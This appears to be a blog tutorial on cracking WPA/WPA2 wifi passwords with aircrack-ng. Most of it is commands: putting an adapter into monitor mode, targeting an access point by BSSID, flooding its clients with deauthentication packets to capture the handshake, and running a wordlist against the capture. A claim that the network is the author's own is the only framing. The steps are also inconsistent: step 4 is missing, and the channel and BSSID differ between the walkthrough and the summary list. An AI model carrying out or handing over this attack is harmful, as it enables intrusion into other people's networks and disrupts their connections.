In this post we will learn how to hack wifi with wpa and wap2 security using aircrack-ng in linux .Hacking wifi is not as easy as you think but it is not also so hard to crack a wifi and get it's password. wifi stands for wireless fidelity. The network i will hack is mine and none of the third party's confidentiality is compromised here.
PREREQUISITE:
- one external usb wifi adapter that supports moniter mode.
- kali linux operating system (can be in a virtual machine)
- aircrack-ng suite installed in kali linux
- password list(after capturing hashed password we will convert it into normal password)
step1 : first insert your usb wifi adapter into the computer and check if it properly connected or not.
To check , type the command in linux terminal : ifconfig
ifconfig
if you see wlan0 , then it is properly connected.
step 2 : enable moniter mode, to enable moniter mode :
type the command : sudo airmon-ng start wlan0
now , you can see moniter mode enable . sometimes you can see linux tells you to kill some processes as in my case , if this happens then kill that processes by typing the command : airmon-ng check kill
or you can type : kill (pid1)(pid2)....
kill 508 1420 |
step3 : To discover networks around us . type command : airodump-ng wlan0
airodump-ng wlan0
To stop the searching processing , press ctrl+c
now you can see so many bssid(mac addresses) and network names.
let say our network name is kali.
The network I’m interested in is the one named Kail on channel 1, Take note of the channel number and the the MAC address of the target access point. in my case:
- Channel: 1
- BSSID: 50:D4:F7:E5:66:F4
airodump-ng -c 1 -w kali --bssid 50:D4:F7:E5:66:F4 wlan0 |
For deauthenticate we will use aireplay-ng
aireplay-ng -0 0 -a 50:D4:F7:E5:66:F4 wlan0 |
We haven't captured the four-way handshake, but we do obtain the WPA handshake as soon as I deauthenticate clients, as shown in the image below.
Step 5: Password Cracking How do you decode a four-way handshake?
To list all current folders and files, type "ls" on the terminal.
Select the file with the ".cap" suffix, which should be called kali-01.cap, and run the command:
aircrack-ng -w wordlist.txt kali-01.cap
What aircrack-ng tool is comparing the hash inside the .cap file with the hashes of the passwords listed inside the wordlist.txt file by converting every single line from text to hash and when the hashes match, we know the password.
Now all you have to do is wait till you see ( KEY Found ( your key is here 😉 ).
All Step in few lines
- airodump-ng wlan
- airodump-ng -c 2 -w wifi –bssid 50:D4:F7:E5:66:F4 wlan0
- aireplay-ng -0 0 -a C4:6E:1F:F6:34:B8 wlan0mon
- aircrack-ng -w wordlist.txt kali-01.cap
Comments
Post a Comment